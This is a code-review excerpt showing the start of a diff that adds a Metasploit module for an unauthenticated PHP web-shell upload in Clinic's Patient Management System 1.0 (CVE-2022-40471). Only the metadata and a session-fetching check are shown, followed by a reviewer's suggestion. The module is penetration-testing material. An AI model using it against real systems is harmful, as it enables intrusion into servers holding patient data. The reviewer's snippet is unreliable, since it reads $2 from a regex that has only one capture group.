modules/exploits/multi/http/clinic_pms_fileupload_rce.rb

```diff
@@ -0,0 +1,244 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Clinic\'s Patient Management System 1.0 - Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated file upload vulnerability in Clinic's
+          Patient Management System 1.0. An attacker can upload a PHP web shell and execute
+          it by leveraging directory listing enabled on the `/pms/user_images` directory.
+        },
+        'Author' => [
+          'Aaryan Golatkar', # Metasploit Module Developer
+          'Oğulcan Hami Gül', # Vulnerability discovery
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Privileged' => false,
+        'Targets' => [
+          ['Clinic Patient Management System 1.0', {}]
+        ],
+        'DefaultTarget' => 0,
+        'References' => [
+          ['EDB', '51779'],
+          ['CVE', '2022-40471'],
+          ['URL', 'https://www.cve.org/CVERecord?id=CVE-2022-40471'],
+          ['URL', 'https://drive.google.com/file/d/1m-wTfOL5gY3huaSEM3YPSf98qIrkl-TW/view']
+        ],
+        'DisclosureDate' => '2022-10-31',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms']),
+      OptInt.new('LISTING_DELAY', [true, 'Time to wait before retrieving directory listing (seconds)', 2])
+    ])
+  end
+
+  def check
+    print_status('Checking if target is vulnerable...')
+
+    # Step 1: Retrieve PHPSESSID
+    vprint_status('Fetching PHPSESSID from the server...')
+    res_session = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'users.php'),
+      'method' => 'GET'
+    })
+
+    unless res_session && res_session.code == 302 && res_session.get_cookies
+      print_error('Failed to retrieve PHPSESSID. Target may not be vulnerable.')
+      return CheckCode::Safe
+    end
+
+    phpsessid = res_session.get_cookies.match(/PHPSESSID=([^;]+)/)[1]
```

Comment:
I don't see check of match return value  - if match returns `nil`, the code might throw an error as you're trying to access first element of `nil`. This might be bit better:
```suggestion
    phpsessid = res_session.get_cookies
    if (phpsessid =~ /PHPSESSID=([^;]+)/)
          phpsessid = $2
    else
            return CheckCode::Safe
    end
```